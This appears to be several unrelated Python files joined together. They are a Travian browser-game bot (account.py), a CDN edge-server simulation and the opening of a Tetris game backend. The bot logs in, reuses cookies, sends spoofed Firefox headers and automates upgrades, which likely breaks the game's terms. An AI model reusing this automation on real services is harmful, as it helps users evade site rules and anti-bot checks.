def __init__(self, value):
"""Constructor"""
self.__value = value
#----------------------------------------------------------------------
def __str__(self):
"""输出错误信息"""
return self.__value
|
account.py
|
import urllib
from urllib.request import urlopen
from urllib.parse import urlencode, quote
from http.cookiejar import CookieJar, FileCookieJar,LWPCookieJar
import sys
import pymongo
import re
import requests, pickle, http
from html import unescape
#import thread_file
import time
import threading
from bs4 import BeautifulSoup
class Account():
def __init__(self, username, *argv):
self.user = username
Account.argv = argv
if self.user == 'beetchplz':
self.dorf1 = 'https://ts4.travian.fr/dorf1.php'
Account.dorf1 = self.dorf1
Account.addr = 'https://ts4.travian.fr/'
elif self.user == 'lebibot':
self.dorf1 = 'https://tx10.mena.travian.com/dorf1.php'
Account.dorf1 = self.dorf1
Account.addr = 'https://tx10.mena.travian.com/'
else:
exit(1)
#self.cj = FileCookieJar()
try :
self.cookie_file_LWP = 'cookie_file'
self.cj = LWPCookieJar(self.cookie_file_LWP)
if not self.cj:
self.cj.load(self.cookie_file_LWP)
print('Cookie set.')
except :
print('error cookie')
self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cj))
Account.opener = self.opener
def connect_db(self):
myconnect = pymongo.MongoClient("mongodb://localhost:27017/")
print(myconnect)
Account.mydb = myconnect["travian-db"]
Account.name_farm_db = 'farm_{}'.format(self.user)
def init_user(self):
print("__init_user:")
users = self.mydb["users"]
print(type(users))
self.user_info = users.find_one({'username': self.user})
self.password = self.user_info['password']
def login(self):
self.connect_db()
self.init_user()
self.connect_with_cookie()
def connect_table(self, table_name):
table = self.mydb[table_name]
return table
def check_connection_result(self):
with open (self.file, 'r') as f:
page = f.read().replace('\n', '')
strings = re.findall(r'CONNEXION',page)
captcha = re.findall(r'captcha', page)
if ( strings == [] ):
print('Successfully connect ')
return 1
else:
print('Connection failed')
if (captcha.count('captcha') > 0):
print('get fucked by captcha')
print(captcha)
return 0
def connect_with_cookie(self):
if self.cj :
print ('trying to log with cookie')
#farm_page = self.opener.open('https://ts4.travian.fr/dorf1.php')
farm_page = self.opener.open(self.dorf1)
self.file = './dorf1.html'
try :
with open(self.file, 'w') as f:
f.write(farm_page.read().decode('utf-8'))
except IOError as e :
print ('IOerro({0}): {1}'.format(e.errno, e.strerror))
if self.check_connection_result():
return
else :
self.connect_with_credentials()
else :
print('no cookies go to connect_with_credentials')
self.connect_with_credentials()
def connect_with_credentials(self):
self.file = './connection.html'
print('Trying login with credentials.')
login_data = urlencode({'name' : self.user, 'password' : self.password, 's1': 'Se connecter', 'w': '1920:1080'})
#print(login_data.encode('utf-8'))
link = Account.addr + "/login.php?"
connected = self.opener.open(link, login_data.encode('utf-8'))
#print(connected.read().decode('utf-8'))
with open(self.file, 'w') as f:
f.write(connected.read().decode('utf-8'))
if self.check_connection_result():
self.cj.save()
return
else :
print('Exiting : All login method tried had failed..')
sys.exit(1)
class List(Account):
def __init__(self):
print('__init__ List')
List.list_upgrade = []
self.lvl_list = [1,2,3,4,5,6,7,8,9,10]
self.farm_list = ['fer','terre','fer','cc','all']
j = 0
if len(sys.argv) > 2:
for i in Account.argv[0]:
if j >= 2:
List.list_upgrade.append(i)
j = j +1
print(List.list_upgrade)
def check_entry(self, user_input):
arr = user_input.split()
farm = None
lvl = None
tmp = -1
#for i in user_input_array:
if arr and arr[1] and arr[1] in self.farm_list:
farm = arr[1]
if len(arr) > 1 and arr[2]:
try:
tmp = int(arr[2])
except:
print('error in parsing lvl')
else:
print('not enought args')
if tmp in self.lvl_list:
lvl = tmp
else:
print('error in farm parsing ')
return
print('Farm : {} Lvl : {}'.format(farm, lvl))
if farm and lvl:
self.add_entry(user_input)
else:
print('error in parsing user entry ')
unser_entry = None
def handle_entry(self, user_input):
self.check_entry(user_input)
def add_entry(self, user_input):
List.list_upgrade.append(user_input)
print('new entry is : {}, list entry is : {}'.format( user_input, List.list_upgrade))
def check_user_list(self, user_input):
print(user_input)
if len(sys.argv) > 2 or user_input:
for i in List.list_upgrade:
print('check{}'.format(i))
if i in self.farm_list:
farm = i
print('found farm : ok ')
elif int(i) in self.lvl_list:
lvl = i
print('found lvl : ok')
else :
print('error in user entry')
return
return {'farm':farm, 'lvl' : lvl}
class Village(List):
def __init__(self):
pass
def check_number(self):
with open ('./dorf1.html', 'r') as f:
page = BeautifulSoup(f.read().replace('\n', ''), 'html.parser')
matches = re.finditer(r'class=\"slots\">.*?(\d|\d\d).*?span', str(page))
if not matches :
print('parsing village failed returning ')
return -1
for matchNum, match in enumerate(matches, start=1):
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
nb_village = int(match.group(groupNum))
return nb_village
def get_list_url(self):
list_url_village = []
with open ('./dorf1.html', 'r') as f:
page = BeautifulSoup(f.read().replace('\n', ''), 'html.parser')
matches = re.finditer(r'\?newdid=\d{3,6}&', str(page))
if not matches :
print('parsing village failed returning ')
return -1
for matchNum, match in enumerate(matches, start=1):
if matchNum != 1:
list_url_village.append(match.group())
return list_url_village
class Farm(Village):
def __init__(self):
print('__init__ Farm')
self.farms = Account.connect_table(self, Account.name_farm_db)
self.addr = Account.addr
self.opener = Account.opener
def parse_farm(self, id_village):
print("{}{}",id_village, self.get_list_url)
tmp_url_village = self.get_list_url()
url_village = tmp_url_village[id_village ]
link_village = "{}{}".format(Account.dorf1, url_village)
self.request('./dorf1.html', link_village , Account.dorf1)
with open ('./dorf1.html', 'r') as f:
page = f.read().replace('\n', '')
matches = re.finditer(r'class=\"( |notNow |good )level.*?colorLayer.*?level..', page)
'''
for matchNum, match in enumerate(matches, start=1):
print ("Match {matchNum} was found at {start}-{end}: {match}".format(matchNum = matchNum, start = match.start(), end = match.end(), match = match.group()))
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
print ("Group {groupNum} found at {start}-{end}: {group}".format(groupNum = groupNum, start = match.start(groupNum), end = match.end(groupNum), group = match.group(groupNum)))
'''
list_farm = []
i = 1
for matchNum, match in enumerate(matches, start=1):
clean_line = match.group(0)[7:].strip()
#print(clean_line)
status = re.match(r'^.*?level',clean_line)
status = status.group(0)
if status == 'level':
status = 'bad'
#print(status)
type_farm = re.search(r'gid.', clean_line).group(0)
type_gid = {'gid1': 'bois', 'gid2': 'terre', 'gid3': 'fer', 'gid4': 'cc' }
farm_type = type_gid[type_farm]
level = int(re.search(r'level\d(\d|)', clean_line).group(0).replace('level', ''))
farm_id = int(re.search(r'buildingSlot\d(\d|)', clean_line).group(0).replace('buildingSlot', ''))
link_farm = 'build.php?id={}'.format(farm_id)
list_farm.append({ 'id_farm' : farm_id, 'type' : farm_type, 'level' : level, 'status' : status, 'link_farm' : link_farm, 'evol' : level, 'id_village' : id_village})
return list_farm
def parse_construct(self):
contruct_list = [{None}]
with open ('./dorf1.html', 'r') as f:
page = f.read().replace('\n', '')
matches = re.finditer(r'Centre du village</title.*?li>.*?ul>', page)
for matchNum, match in enumerate(matches, start=1):
print(match.group())
glob_match = match.group()
matches = re.finditer(r'class=\"name\">(.*?)<span.*?lvl\">(Niveau \d{1,2})</span', glob_match)
for matchNum, match in enumerate(matches, start=1):
print ("{} Match {matchNum} was found at {start}-{end}: {match}".format(len(match.groups()), matchNum = matchNum, start = match.start(), end = match.end(), match = match.group()))
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
print ("Group {groupNum} found at {start}-{end}: {group}".format(groupNum = groupNum, start = match.start(groupNum), end = match.end(groupNum), group = match.group(groupNum)))
def print_table(self, tablename):
table = Account.mydb[tablename]
for j in table.find():
print(j)
def retfarm(self):
return Account.mydb[Account.name_farm_db]
def create_farm_db(self, list_farm):
#farms = Account.mydb["farm"]
farms = self.farms
try :
farms.insert_many(list_farm)
except :
print('Duplicate id key, cannot insert value.')
return -1
print('All entry inserted')
def update_farm_reset(self,list_farm):
counter= 0
for i in list_farm:
tmp = self.farms.replace_one({"id_farm" : i['id_farm'], "id_village" : i["id_village"]}, i )
counter = counter + tmp.modified_count
if counter == 0 :
self.create_farm_db(list_farm)
def update_farm(self,list_farm):
print("__update_farm()")
counter= 0
for i in list_farm:
query = self.farms.find_one({ 'evol':{"$gt": i['level']}, "id_farm" : i['id_farm'], "id_village" : i["id_village"]})
if query:
print("{} is in construction".format(query))
if query is None:
tmp = self.farms.replace_one({"id_farm" : i['id_farm'], "id_village" : i["id_village"]}, i )
counter = counter + tmp.modified_count
else:
#print("conflict found : lvl query :{} {} lvl list :{} {} ".format(query['level'], type(query['level']), i['level'], type(i['level']) ))
if query and query['level'] != i['level']:
tmp = self.farms.replace_one({"id_farm" : i['id_farm'], "id_village" : i["id_village"]}, i )
counter = counter + tmp.modified_count
if not counter:
print('nothing to update')
else:
print("{} entry updated in farm".format(counter))
def request(self, file, link, referer):
header = urlencode([('Host', 'ts4.travian.fr'),
('Referer', 'https://ts4.travian.fr/build.php?id=4'),
('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Accept-Language', 'fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3'),
('Accept-Encoding','gzip, deflate, br'),
('Connection', 'keep-alive'),
('Referer', referer),
('Upgrade-Insecure-Requests', '1'),
('TE', 'Trailers')
])
self.opener.addheader = header.encode('utf-8')
req = self.opener.open(link)
with open(file, 'w') as f:
f.write(req.read().decode('utf-8'))
def lvl_up_all(self, levell, village):
id_village = village
level = int(levell)
print("lvlupall..")
query = self.farms.find_one({'level':{"$lt": level}, 'status' : {"$regex": "^good"}, 'evol' : {"$lt": level}, 'id_village' : id_village})
if query:
print("{} lvl {} en construction".format(query['type'], query['level']))
if not query:
ll = int(level)
queryy = self.farms.find_one({'level' : { "$lt" : ll}, 'id_village' : id_village})
if queryy is None :
print("all farms are lvl {}, deleting elem".format(level))
return -1
return 0
print(query)
#for i in query:
# print("- {} {} -".format(i['type'] , i['level']))
formated_addr = "{}{}".format(self.addr, query['link_farm'])
farm_update = self.opener.open(formated_addr)
self.file = 'update_farm.html'
with open(self.file, 'w') as f:
f.write(farm_update.read().decode('utf8'))
addr_args = self.parse_lvl_up(self.file)
if not addr_args:
return ;
link_update = self.addr +'dorf1.php?'+ addr_args
#dorf = self.opener.open(link_update)
query['evol'] = query['level'] + 1
tmp = self.farms.replace_one({"id_farm" : query['id_farm'], 'id_village' : id_village}, query )
counter = tmp.modified_count
if not counter:
print('nothing to update')
else:
print("{} entry updated in farm".format(counter))
self.request('dorf1.html', link_update, formated_addr)
def lvl_up(self, farm_type, level):
print('lvl_up() vv result_query vv')
query = self.farms.find_one({'type':farm_type})
print(query)
if query and query['level'] >= int(level):
print('all farm already at this lvl, deleting elem in list')
return -1
formated_addr = "{}{}".format(self.addr, query['link_farm'])
farm_update = self.opener.open(formated_addr)
self.file = 'update_farm.html'
with open(self.file, 'w') as f:
f.write(farm_update.read().decode('utf8'))
addr_args = self.parse_lvl_up(self.file)
if not addr_args:
return ;
link_update = self.addr +'dorf1.php?'+ addr_args
#dorf = self.opener.open(link_update)
print(link_update)
self.request('dorf1.html', link_update, formated_addr)
def parse_lvl_up(self, file):
print('parse_lvl_up()')
clean_line = None
with open (file, 'r') as f:
page = f.read().replace('\n', '')
matches = re.finditer(r"<but(.*?)niveau(.*?)dorf1\.php\?(.*?)';(.*?)Button", page)
## CAREFULL CAN USE GOLD
for matchNum, match in enumerate(matches, start=1):
clean_line = unescape(match.group(3))#[7:].strip()
break
if clean_line and ('b=') in clean_line:
print("GOLD WILL BE SPEND, CANCEL..")
clean_line = None
return clean_line
class Checker(Farm):
def __init__(self):
print('coucou')
print('__init__ Checker')
#self.farms = Farm.farms
self.farms = self.retfarm()
def is_spe_upgrade_avalible(self,farm_type, lvl):
#self.print_table('Farm')
query = self.farms.find({'status' : 'good level', 'type': farm_type, 'level': lvl})
if not query:
print('No upgrae avalible')
return 0
else:
print('upgrade {} lvl {} avalible'.format(farm_type, lvl))
return 1
def is_upgrade_avalible(self):
query = self.farms.find({'status' : 'good level'})
for i in query:
if not i:
print ("KO")
print(i)
if not query:
print('No upgrae avalible')
return 0
else:
print('upgrade avalible')
return 1
def check_elem_list(self, list_upgrade):
if self.is_upgrade_avalible() == 0 :
print('0 upgrade avalible, cancel checker')
return
else :
print("got fucked")
k =0
for i in list_upgrade:
j = i.split()
print('{} {}'.format(i, j))
if k == 0 or j[-1] == '-':
if j[0][0] == 'v':
vivi = re.findall(r'\d+',j[0])
self.update_farm(self.parse_farm(int(vivi[0])))
if j[1] == 'all':
if self.lvl_up_all(j[2],int(vivi[0])) == -1 :
del list_upgrade[0]
k = k+1
'''arr = list_upgrade[0].split()
if arr[0] == 'del':
print("Deleting list")
list_upgrade = []
return
if arr[0][0] == 'v':
print ('okokok')
print(arr[0])
vivi = re.findall(r'\d+',arr[0])
print(vivi[0])
self.update_farm(self.parse_farm(int(vivi[0])))
if arr[1] == 'all':
if self.lvl_up_all(arr[2],int(vivi[0])) == -1 :
del list_upgrade[0]
else:
print("KO VVVV")'''
return
for i in list_upgrade:
if self.is_spe_upgrade_avalible(arr[0], arr[1]) == 1:
if self.lvl_up(arr[0], arr[1]) == -1:
del list_upgrade[0]
def check_list(self):
if not List.list_upgrade or List.list_upgrade == []:
print('nothing in the upgrade list.. waiting.. or exiting.. dkdc.--{}--'.format(List.list_upgrade))
else :
print('list_upgrade : {}'.format(List.list_upgrade))
self.check_elem_list(List.list_upgrade)
class Hoo(Checker):
def ok(self):
print(List.list_upgrade)
class MyThreadCheck(Checker):
#def __init(self):
# print('__init__ ThreadCheck')
def background(self):
print('in bckground')
while True:
self.check_list()
time.sleep(60)
def loop(self):
print('entering loop')
# now threading1 runs regardless of user input
threading1 = threading.Thread(target=self.background)
threading1.daemon = True
threading1.start()
print('bckground complete')
# while True:
# time.sleep(1)#print(List.list_upgrade)
#def print_list():
#print(List.list_upgrade)
class MyThread(List):
def __init__(self, List):
print('__init__ Mythread')
print(self.list_upgrade)
self.farm_list = List.farm_list
self.lvl_list = List.lvl_list
ui = ""
def background(self):
while True:
time.sleep(1)
self.ui = input()
def loop(self):
# now threading1 runs regardless of user input
threading1 = threading.Thread(target=self.background)
threading1.daemon = True
threading1.start()
while True:
if self.ui == 'exit':
#other_function()
sys.exit()
elif self.ui :
#print("input is : {}.".format(self.ui))
self.handle_entry(self.ui)
#self.check_list()
self.ui = None
"""
username = 'AwsomeUSer'
password = 'AwsomePsswd'
resp1 = opener.open('https://ts4.travian.fr/login.php?name=AwsomeUser&password=AwsomePsswd&s1=Se+connecter&w=1920%3A1080')
resp = opener.open('https://ts4.travian.fr/login.php', login_data)
farmv3 = opener.open('https://ts4.travian.fr/dorf1.php?newdid=20009&')
with open('/tmp/farm.html', 'a') as f:
f.write(farmv3.read())
#slot8 = opener.open('https://ts4.travian.fr/build.php?id=8')
#construct = opener.open('https://ts4.travian.fr/dorf1.php?a=8&c=e5c629')
#with open('/tmp/result.html', 'a') as f:
# f.write(construct.read())
"""
if __name__ == '__main__':
username = sys.argv[1]
account = Account(username, sys.argv)
account.login()
l = List()
vivi = Village()
farm = Farm()
#l.check_user_list()
#farm.create_farm_db(farm.parse_farm())
#for i in range(0, vivi.check_number()):
#farm.update_farm_reset(farm.parse_farm(i))
#farm.parse_construct()
#farm.lvl_up('fer', 2)
#farm.parse_lvl_up('update_farm.html')
#print (List.list_upgrade)
#Hoo().ok()
#Checker()
op = MyThreadCheck()
print('after instancification' )
op.loop()
gg = MyThread(l)
gg.loop()
print('hello')
''' def background(self):
while True:
time.sleep(5)
def loop(self):
# now threading1 runs regardless of user input
threading1 = threading.Thread(target=self.background)
threading1.daemon = True
threading1.start()
while True:
print(List.list_upgrade)
#self.check_list()'''
|
edgeServer.py
|
import pickle
import socket
import sys
import time
import sched
import selectors
import hashlib
import os
sys.path.insert(0, "../")
from _thread import *
from threading import Timer, Thread, Lock
from config import *
from messages.edge_heartbeat_message import *
from messages.content_related_messages import *
EDGE_SERVER_STORAGE_CAPACITY = 70000000000
current_free_space = EDGE_SERVER_STORAGE_CAPACITY
"""
n_clients is the variable containing number of clients this edge server is serving
n_clients_l is the lock of n_clients
"""
n_clients = 0
n_clients_l = Lock()
# Dictionary of files present at the edge server
# format : content_id: filename
content_dict = {}
content_dict_l = Lock()
# format : content_id : (time.time(), file_size)
lru_dict = {}
lru_dict_l = Lock()
location_id = 0
def dumpContentDict():
global content_dict
f = open(EDGE_CONTENT_DICT_FILENAME, 'wb')
pickle.dump(content_dict, f)
f.close()
def loadContentDict():
global content_dict
if not os.path.isfile(EDGE_CONTENT_DICT_FILENAME):
return
f = open(EDGE_CONTENT_DICT_FILENAME, 'rb')
content_dict = pickle.load(f)
f.close()
def dumpLRUDict():
global lru_dict
f = open(EDGE_LRU_FILENAME, 'wb')
pickle.dump(lru_dict, f)
f.close()
def loadLRUDict():
global lru_dict
if not os.path.isfile(EDGE_LRU_FILENAME):
return
f = open(EDGE_LRU_FILENAME, 'rb')
lru_dict = pickle.load(f)
f.close()
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.digest()
def send_heartbeat_primary():
global n_clients,n_clients_l,location_id
host = LOAD_BALANCER_PRIMARY_IP # LB Primary
port = LB1_HEARTBEAT_LISTENER_PORT
while True:
try:
try:
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket successfully created')
except socket.error as err:
print('Socket creation failed with error %s', err)
return
sock.connect((host, port))
print("Connected to LB Primary")
except Exception as e:
print('Load balancer primary seems to be down. Trying to reconnect in a second.', e)
time.sleep(1)
continue
while(True):
print("Try to send heartbeat")
n_clients_l.acquire()
load = n_clients
n_clients_l.release()
msg = EdgeHeartbeatMessage(location_id,load)
try:
msg.send(sock)
except Exception as e:
print("Connection to load balancer primary failed",e)
break
time.sleep(EDGE_HEARTBEAT_TIME)
sock.close()
def send_heartbeat_secondary():
global n_clients,n_clients_l, location_id
host = LOAD_BALANCER_SECONDARY_IP # LB Primary
port = LB2_HEARTBEAT_LISTENER_PORT
while True:
try:
try:
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket successfully created')
except socket.error as err:
print('Socket creation failed with error %s', err)
return
sock.connect((host, port))
print("Connected to LB Secondary")
except Exception as e:
print('Load balancer secondary seems to be down. Trying to reconnect in a second.',e)
time.sleep(1)
continue
while(True):
print("Try to send heartbeat")
n_clients_l.acquire()
load = n_clients
n_clients_l.release()
msg = EdgeHeartbeatMessage(location_id,load)
try:
msg.send(sock)
except Exception as e:
print("Connection to load balancer secondary failed",e)
break
time.sleep(EDGE_HEARTBEAT_TIME)
sock.close()
def connectOrigin(ipblocks):
"""
Method to connect to LBs
IP blocks contains the DNS response
"""
err_count = 0
for host, port in ipblocks:
s = socket.socket()
try:
print("Connecting ",host,":",port)
s.connect((host, port))
print("Connected ",host,":",port)
break
except socket.error:
err_count += 1
print("Connection failed ",host,":",port)
continue
if err_count == 2:
print("Origin server could not be reached!")
return s,0
else:
print("Connection established to the origin server")
return s,1
def fetch_and_send(conn,addr,content_id,last_received_seq_no):
global EDGE_SERVER_STORAGE_CAPACITY, current_free_space, content_dict_l, content_dict, lru_dict_l, lru_dict
ipblocks = [(ORIGIN_SERVER_IP_1,ORIGIN_SERVER_PORT_1),(ORIGIN_SERVER_IP_2,ORIGIN_SERVER_PORT_2)]
flag = 0 # 0 is default, 1 is finished, -1 is not finished
while True:
s,err = connectOrigin(ipblocks)
if err == 0:
raise Exception("Load Balancer could not be reached!")
message = ContentRequestMessage(content_id, 0)
message.send(s)
file_des = FileDescriptionMessage(0, 0, '', bytearray())
file_des.receive(s)
print("File fetching: ",file_des.file_name)
# now check if this file can be brought in or not:
if file_des.file_size >= EDGE_SERVER_STORAGE_CAPACITY:
# rather than storing this file, just send this file to the edge server
print("File too big!")
pass
else:
# this following can be used
# first check if the total free space currently available is less or not
while current_free_space < file_des.file_size:
# remove least recently used file
lru_dict_l.acquire()
content_id_to_delete = min(lru_dict, key=lru_dict.get)
current_free_space += lru_dict[content_id_to_delete][1]
del lru_dict[content_id_to_delete]
dumpLRUDict()
lru_dict_l.release()
content_dict_l.acquire()
os.remove('data/'+content_dict[content_id_to_delete])
del content_dict[content_id_to_delete]
dumpContentDict()
content_dict_l.release()
print("File Deleted")
# content_dict[file_des.content_id] = file_des.file_name
lru_dict_l.acquire()
lru_dict[file_des.content_id] = (time.time(), file_des.file_size)
dumpLRUDict()
lru_dict_l.release()
if flag!=-1:
file_des.send(conn)
flag = 0
print('data/'+file_des.file_name+"...........")
with open('data/'+file_des.file_name,'wb') as f:
recv_size = 0
file_size = file_des.file_size
req_seq = 0
while True:
mes = ContentMessage(0,0)
print('receiving data...')
try:
mes.receive(s,file_size,recv_size)
except:
if mes.received == False:
print('Yo')
flag = -1
last_received_seq_no = req_seq
break
print(mes.content_id)
print(mes.seq_no)
req_seq = mes.seq_no+1
data = mes.data
if not data:
break
f.write(data)
recv_size+=len(data)
current_free_space -= len(data)
if last_received_seq_no>mes.seq_no:
continue
mes.send(conn)
if flag == -1:
continue
flag = 1
print("successfully received the file")
if md5('data/'+file_des.file_name) == file_des.md5_val:
print("MD5 Matched!")
else:
print("MD5 didn't match")
os.remove('data/'+file_des.file_name)
content_dict_l.acquire()
content_dict[content_id]=file_des.file_name
dumpContentDict()
content_dict_l.release()
# print("After updating the content_dict")
# print(content_dict)
# print("After writing Current free space = "+str(current_free_space))
s.close()
if flag == 1:
break
def serve_client(conn,addr):
global n_clients_l,n_clients,content_dict,lru_dict_l,lru_dict
n_clients_l.acquire()
n_clients = n_clients+1
n_clients_l.release()
message = ContentRequestMessage(0, 0)
message.receive(conn)
# Get filename from file
if message.received == False:
return
# Check if file is present in edge server
if message.content_id in content_dict:
filename = content_dict[message.content_id]
# before sending the file, send its details plus a checksum
file_size = int(os.stat('data/'+filename).st_size)
lru_dict_l.acquire()
lru_dict[message.content_id] = (time.time(), file_size)
dumpLRUDict()
lru_dict_l.release()
file_des = FileDescriptionMessage(message.content_id, file_size, filename, md5('data/'+filename))
file_des.send(conn)
f = open('data/'+filename, 'rb')
# f.seek(message.seq_no*1018)
l = f.read(1018)
i = 0
last_received_seq_no = message.seq_no
while (l):
if message.seq_no <= i:
msg = ContentMessage(message.content_id, i)
msg.data = l
msg.packet_size = len(l)
msg.send(conn)
i += 1
l = f.read(1018)
f.close()
else:
# Get chunks of data from origin and send to client
fetch_and_send(conn,addr,message.content_id,message.seq_no)
n_clients_l.acquire()
n_clients = n_clients-1
n_clients_l.release()
conn.close()
def main():
global n_clients, n_clients_l, location_id
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Socket successfully created")
except socket.error as err:
print ("socket creation failed with error %s" %(err))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = int(sys.argv[1])
location_id = int(sys.argv[2])
s.bind(('', port))
print ("socket binded to %s" %(port))
s.listen(5)
threads = []
while True:
c, addr = s.accept()
print("Accepted connection from", addr)
t = Thread(target = serve_client, args = (c,addr))
threads.append(t)
t.start()
for t in threads:
t.join()
s.close()
if __name__ == '__main__':
loadContentDict()
loadLRUDict()
Threads = []
t1 = Thread(target = send_heartbeat_primary)
t1.start()
t2 = Thread(target = send_heartbeat_secondary)
t2.start()
main()
t1.join()
t2.join()
|
game_client.py
|
# This file defines the back end of the Tetris game
#
# GameState is the base class of GameClient.
#
# GameClient.Run() will start two threads:
# - _ProcessActions: Process the action list every x seconds
# - _AutoDrop: Auto drops the current piece.
#
# GameClient:
# - current piece
# - held piece
# - piece list
# - color_map: game board
# - InputActions(...): Inputs a list of actions.
# - ProcessActions(...): Lets the game client process a list of actions
# directly
# - ProcessAction(...): Lets the game client process one actions directly
# - PutPiece(...): Puts the current piece if the position is valid.
# - GetState(...): Gets game state, useful to AI
# - CheckValidity(...): Checks if a move is valid
# - SpawnPiece(...): Sets the current piece.
# - Restart(...): Restarts the game.
# - Rotate(...): Alternatively, callers can directly call Rotate to rotate
# current_piece
# - Move(...): Alternatively, callers can directly call Move to move the
# current_piece
#
import copy
import queue
import threading
import time
from threading import Lock
from typing import Tuple, List
import numpy as np
import actions
import shape
# Some global settings
DEFAULT_LENGTH = 20
DEFAULT_WIDTH = 10
MAP_PADDING_SIZE = 4
# When there are less than threshold pieces, spawn a new bag.
REFILL_THRESHOLD = 5
# Disable the auto drop in next few seconds
MAXIMUM_LOCK_TIME = 4
INCREMENTAL_LOCK_TIME = 1
# Scores
SINGLE = 5
DOUBLE = 10
TSS = 20
TRIPLE = 40
QUAD = 50
TSD = 60
TST = 80
PC = 120
# ATTACKS
ATTACK_DOUBLE = 1
ATTACK_TSS = 2
ATTACK_TRIPLE = 2
ATTACK_QUAD = 4
ATTACK_TSD = 4
ATTACK_TST = 6
ATTACK_PC = 10
class InternalError(Exception):
"""Any internal errors."""
class GameState:
def __init__(self):
self.height = 0
self.width = 0
self.color_map = np.array([])
self.current_piece = None
self.held_piece = None
self.score = 0
self.piece_list = []
self.is_gameover = False
self.can_swap = True
self.accumulated_lines_eliminated = 0
self.piece_dropped = 0
self.blevel_increase = False
self.level = 0
self.line_sent = 0
self.line_received = 0
def __deepcopy__(self, memodict=None):
if memodict is None:
memodict = dict()
another = copy.copy(self)
another.color_map = self.color_map.copy()
if self.current_piece is not None:
another.current_piece = self.current_piece.copy()
if self.held_piece is not None:
another.held_piece = self.held_piece.copy()
another.piece_list = copy.deepcopy(self.piece_list.copy())
return another
def copy(self):
return self.__deepcopy__()
def __str__(self):
ret = ""
ret += f"""height: {self.height}
width: {self.width}
color_map: {self.color_map}
current_piece: {self.current_piece}
held_piece: {self.held_piece}
score: {self.score}
piece_list: {self.piece_list}
is_gameover: {self.is_gameover}
can_swap: {self.can_swap}
piece_dropped: {self.piece_dropped}
level: {self.level}
"""
class GameClient(GameState):
def __init__(self, height: int = DEFAULT_LENGTH, width: int = DEFAULT_WIDTH, map_height_padding=MAP_PADDING_SIZE,
map_side_padding=MAP_PADDING_SIZE):
super().__init__()
self.height = height
self.width = width
self.map_height_padding = map_height_padding
self.map_side_padding = map_side_padding
self.dtype = np.uint8
self.dtype_length = 8
if self.width + 2 * map_side_padding > 8:
self.dtype = np.uint16
self.dtype_length = 16
if self.width + 2 * map_side_padding > 16:
self.dtype = np.uint32
self.dtype_length = 32
if self.width + 2 * map_side_padding > 32:
self.dtype = np.uint64
self.dtype_length = 64
if self.width + 2 * map_side_padding > 64:
self.dtype = np.uint128
self.dtype_length = 128
if self.width + 2 * map_side_padding > 128:
raise InternalError(
"width too long to support bit map. Consider chaning it to a smaller value.")
# Lock time settings
# When the lock is enabled, count the lock time.
# When the accumulated lock time is greater than the current maximum lock time,
# force to perform the auto drop. Otherwise autodop is disabled for this turn.
# When current locktime is reached but an refresh lock time request is genertaed.
# increase the current maximum lock time by incremental lock time.
self.maximum_lock_time = MAXIMUM_LOCK_TIME
self.current_maximum_lock_time = 0
self.incremental_lock_time = INCREMENTAL_LOCK_TIME
self.accumulate_lock_time = 0
# Only when move or rotate at bottom locks the auto drop
self._enable_lock_time = False
# Color map marks the color for each cell.
self.color_map = np.array([[]], dtype=self.dtype)
# Bit map for a better performance in some calculation.
self.bit_map = np.array([], dtype=self.dtype)
# Lock for current_piece
self.mutex_current_piece = Lock()
self.last_put_piece = None
# List of actions to process
self.action_list = queue.Queue()
self._init_spawn_interval = 500 # 500 ms at level 0
self._current_spawn_interval = 500
# actions.Action
self.last_action = None
self.disable_autodrop = False
self.line_tobesent = 0
# Used when calculate the auto drop interval decrease based on current level.
# Generated from the sigmoid function
# x = np.linspace(0, 40, 40)
# interval_decrease = 110 / (1 + np.exp(0.16 * x))
# interval_decrease = np.cumsum(interval_decrease)
# print(repr(np.cumsum(interval_decrease)))
self.interval_decrease = np.array(
[55., 100.49727968, 150.55179446, 190.28030383,
230.85041422, 260.47244367, 290.38990828, 320.86947489,
345.19115272, 350.63934095, 380.49515164, 400.03022699,
410.5020957, 420.15098155, 430.19789113, 440.8437644,
450.26946046, 455.63636342, 461.08741849, 465.74844074,
469.72957119, 473.12678557, 476.02338748, 478.4914391,
480.59310001, 482.38185737, 483.90364044, 485.19781892,
486.29808909, 487.23325451, 488.02790975, 488.70303602,
489.27651798, 489.76359062, 490.17722443, 490.52845671,
490.82667585, 491.07986489, 491.2948099, 491.47727802])
self._RefillPieces()
self._TakePieceFromList()
self.accumulated_lines_eliminated = 0
# When soft-dropping, temporarily disable auto-drop
self.soft_drop = False
self.piece_dropped = 0
# Must be put after the initializations above
self._InitMap()
def _InitMap(self):
side_padding = (1 << self.map_side_padding) - 1
init_row = (side_padding << (self.map_side_padding + self.width)) | side_padding
bottom_padding = (1 << (self.width + 2 * self.map_side_padding)) - 1
self.bit_map = np.concatenate((
np.array((self.map_height_padding + self.height) * [init_row], dtype=self.dtype),
np.array(self.map_height_padding * [bottom_padding], dtype=self.dtype)), dtype=self.dtype)
self.color_map = np.array([[0 for i in range(self.width)] for x in range(self.height + self.map_height_padding)],
dtype=self.dtype)
def Restart(self):
self._InitMap()
self.piece_list = []
self.held_piece = None
self.current_piece = None
# Lock of the game state
self.mutex_current_piece = Lock()
self.is_gameover = False
self.last_put_piece = None
# List of actions to process
self.action_list = queue.Queue()
self._init_spawn_interval = 500.0
self._current_spawn_interval = 500.0
# actions.Action
self.last_action = []
self.can_swap = True
self.score = 0
self.accumulate_lock_time = 0
self.accumulated_lines_eliminated = 0
self.soft_drop = False
self.piece_dropped = 0
self.line_sent = 0
self.line_received = 0
self.line_tobesent = 0
self._enable_lock_time = False
